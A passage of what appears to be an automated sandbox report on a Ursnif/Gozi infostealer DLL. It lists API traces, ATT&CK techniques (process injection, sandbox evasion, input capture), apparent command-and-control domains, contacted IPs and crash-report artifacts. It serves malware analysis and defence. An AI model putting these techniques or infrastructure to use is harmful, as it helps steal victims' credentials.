                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E2D1825
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDA82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04CDA82B

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 1 | Input Capture 1 | System Time Discovery 2 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      [Behavior graph image. Behavior Graph ID: 500413, Sample: 616412739e268.dll, Startdate: 12/10/2021, Architecture: WINDOWS, Score: 96]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      616412739e268.dll | 6% | Virustotal | -
                      616412739e268.dll | 24% | ReversingLabs | Win32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      0.2.loaddll32.exe.1370000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      5.0.rundll32.exe.4970000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      5.2.rundll32.exe.4970000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      5.0.rundll32.exe.4970000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
                      3.2.rundll32.exe.4cd0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      Source | Detection | Scanner | Label
                      areuranel.website | 7% | Virustotal | -
                      breuranel.website | 7% | Virustotal | -

                      URLs

                      Source | Detection | Scanner | Label
                      https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
                      https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
                      https://watson.tel | 0% | Virustotal | -
                      https://watson.tel | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      msn.com | 13.82.28.61 | true | false | - | high
                      outlook.com | 40.97.116.82 | true | false | - | high
                      HHN-efz.ms-acdc.office.com | 52.97.183.162 | true | false | - | high
                      FRA-efz.ms-acdc.office.com | 52.98.207.194 | true | false | - | high
                      www.msn.com | unknown | unknown | false | - | high
                      www.outlook.com | unknown | unknown | false | - | high
                      areuranel.website | unknown | unknown | true | - | unknown
                      breuranel.website | unknown | unknown | true | - | unknown
                      outlook.office365.com | unknown | unknown | false | - | high

                                    Contacted URLs


                                                    URLs from Memory and Binaries


                                                                                                  Contacted IPs

                                                                                                  Public

                                                                                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                                  52.98.207.194 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                                                                  52.97.218.66 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
                                                                                                  52.97.218.82 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                                                                  40.101.124.226 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                                                                  40.97.153.146 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
                                                                                                  13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                                                                  52.97.137.210 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
                                                                                                  40.97.116.82 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                                                                  52.97.183.162 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:500413
                                                                                                  Start date:12.10.2021
                                                                                                  Start time:00:35:10
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 11m 23s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:616412739e268.dll
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:27
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal96.troj.evad.winDLL@14/12@24/10
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 18% (good quality ratio 16.9%)
                                                                                                  • Quality average: 77.6%
                                                                                                  • Quality standard deviation: 30%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 68%
                                                                                                  • Number of executed functions: 65
                                                                                                  • Number of non-executed functions: 206
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .dll
                                                                                                  • Override analysis time to 240s for rundll32
                                                                                                  Warnings:
                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.203.141.148, 93.184.221.240, 8.247.248.223, 8.247.248.249, 8.247.244.249, 20.82.210.154, 13.89.179.12, 204.79.197.203, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 52.184.81.210
                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Not all processes were analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  Time | Type | Description
                                                                                                  00:37:39 | API Interceptor | 8x Sleep call for process: rundll32.exe modified
                                                                                                  00:37:49 | API Interceptor | 8x Sleep call for process: loaddll32.exe modified
                                                                                                  00:37:57 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  Match | Associated Sample Name / URL | Detection | Context
                                                                                                  40.101.124.226 | S5.exe | malicious | -
                                                                                                  40.97.153.146 | m87xfb63XU.dll | malicious | -
                                                                                                  40.97.153.146 | test1.dll | malicious | -
                                                                                                  40.97.153.146 | 7.dll | malicious | -
                                                                                                  40.97.153.146 | nT5pUwoJSS.dll | malicious | -
                                                                                                  40.97.153.146 | 5instructio.exe | malicious | -
                                                                                                  40.97.153.146 | .exe | malicious | -
                                                                                                  40.97.153.146 | 61Documen.exe | malicious | -
                                                                                                  40.97.153.146 | 65document.exe | malicious | -
                                                                                                  40.97.153.146 | 29mail98@vip.son.exe | malicious | -
                                                                                                  40.97.153.146 | 57document.exe | malicious | -
                                                                                                  13.82.28.61 | 45DOC00111738011537818635391-pdf.exe | malicious | msn.com/

                                                                                                                        Domains


                                                                                                                        ASN


                                                                                                                        JA3 Fingerprints

                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1874b820\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12044
                                                                                                                        Entropy (8bit):3.765368455363511
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:0YuiJ0oXAHBUZMX4jed+x/u7sAwS274It7cJ:MinXoBUZMX4je8/u7sAwX4It7cJ
                                                                                                                        MD5:316CE6E876A182906C00DD2AD8F35040
                                                                                                                        SHA1:54AD11020F6730D0C756C5682E1BAEA55AE1F317
                                                                                                                        SHA-256:74EA72682FCB32B1165308196313E62BADE799EF2947E6D132D5A0D077219B19
                                                                                                                        SHA-512:749DD024BDC05C4918700FCF5740173D68F7FCEF20A4C56BCFF2D894123A628A78AF6B8103512056FBBEF378828B4AAEA3F757FA297DF91C155835C7FD19E77C
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.6.8.2.6.1.5.0.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.6.0.5.2.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.d.3.f.3.5.-.4.3.8.7.-.4.f.e.d.-.b.7.a.f.-.7.6.8.4.9.9.3.f.7.a.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.0.4.5.a.6.7.-.2.2.2.e.-.4.c.7.2.-.b.b.e.c.-.0.8.9.b.4.0.8.1.c.f.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.b.-.d.a.8.9.-.2.e.6.0.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_19a08827\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12246
                                                                                                                        Entropy (8bit):3.765114618947458
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:ogaPiW0oX7HBUZMX4jed+j/u7sSS274It7cl:oJPiQXbBUZMX4jeO/u7sSX4It7cl
                                                                                                                        MD5:9CF8099E09C39847EFFF6FB7B70CEA33
                                                                                                                        SHA1:16B081768605B3C60E9DBF23A1646EBDF70337E0
                                                                                                                        SHA-256:D780C3F704283D57B71AE6362A0F6095E72DEDC4D08062E15094DF7FA1DAD471
                                                                                                                        SHA-512:F9873C535120F8E9BEF91F26B93B9251BD6F06F506E7D53E5EDDAE3E23AE04674686E39BD8BB186632AFF0A43717117E4F61818502AE49E938D546F5FA34EE37
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.9.9.9.8.3.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.9.3.9.0.4.4.8.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.1.d.e.5.4.7.-.b.d.c.0.-.4.a.7.4.-.9.0.f.e.-.4.f.e.1.f.8.d.b.f.f.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.9.a.1.f.8.-.8.2.c.a.-.4.a.c.0.-.9.c.1.f.-.0.4.d.d.4.9.8.8.b.9.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.b.-.f.8.7.1.-.3.6.6.7.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1be8e7ac\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12040
                                                                                                                        Entropy (8bit):3.7654289890935924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:43iu0oX/HBUZMX4jed+x/u7sAwS274It7c/V:IiYX/BUZMX4je8/u7sAwX4It7c/V
                                                                                                                        MD5:47234B5A061C3D57518C75D012598E15
                                                                                                                        SHA1:8054E955AA6274E52832CECAC7BF98AB2AAC4A3E
                                                                                                                        SHA-256:BF44ADFD50F9CC39C25CC5B4642FD4EE5C007226F9AEDC5BBCA7FBA5DDBF6E4F
                                                                                                                        SHA-512:273E8DA585B81F6C6468E2BFFE4E452420D55F06597B6BE6F59747DB2FB96326B7C015A610D4D5A5B1F663593E3398E04C118600B7A5838156B1A568928CE7C6
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.0.8.9.8.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.8.8.7.3.0.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.9.5.e.6.6.3.-.8.9.1.b.-.4.5.3.4.-.a.c.6.0.-.b.9.b.2.2.c.2.8.0.c.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.7.1.d.2.7.-.d.c.2.f.-.4.e.0.1.-.a.e.c.e.-.3.b.4.9.0.b.5.1.3.6.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.2.7.a.b.-.4.b.6.2.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:50 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):35838
                                                                                                                        Entropy (8bit):2.3956337648230916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:zRpsH1iJ4InP5sfRuvUM+sOI36GDZ69CA4nxZN5knmhpIRY:dCkiInERYN+i6G0s1nF5kmc2
                                                                                                                        MD5:6314F249ADC86966FA67E57AE5C44922
                                                                                                                        SHA1:FFCAA1E89BAD579997BE419D71AA5F670200CD69
                                                                                                                        SHA-256:39A76F75342336856B50BBC0B977FBE57722A50B0BD0008499FBBC2A0B263C10
                                                                                                                        SHA-512:95B2148C5D3E31169DD1EBF64FACE7B4728DB4473EA9EC225A992B4BFD640E8E9C29393C9BDE50C99E9EAA94FB45EAA11BECFCC3CF2DE1063EDA9ACA9EA02DBB
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... .........da...................U...........B..............GenuineIntelW...........T...........T.da"............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER270C.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8404
                                                                                                                        Entropy (8bit):3.698373923142492
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi/j/6ZCy6YoDz6Tofg4dgmf8zSNz+prz89bDdsf0Bm:RrlsNiL/6oy6YCz6Tofg4dgmf8zSNjDk
                                                                                                                        MD5:D9504C279DAD3BB36B90B2ABB8BD6024
                                                                                                                        SHA1:8F897066FFB317B3CB6FE7CEDDCD657ABEFA0AD2
                                                                                                                        SHA-256:10A8657425ED12843DE5D88E4AC5FB228E04E30FC2285B5ABFAB0644D4F5FDED
                                                                                                                        SHA-512:1E599A129E128BDA89BBD6B4D4EBB20D56F4B4C3576399CFAF5B5EA8B4227ECE0156F047B9B628EA4091B4D3D829501B68118A87EA09EC46B4ECCE0E714F16F8
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CC.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.4859311182693515
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2+8fm8M4JCdsTMF3+q8vjsTJO4SrSWd:uITf9EqSN07JNmKiJODWWd
                                                                                                                        MD5:14148F5D29C531D9A2DAB8BE378319B4
                                                                                                                        SHA1:2555ADA459F857D0F04C818ED0FA3523FBAEDA54
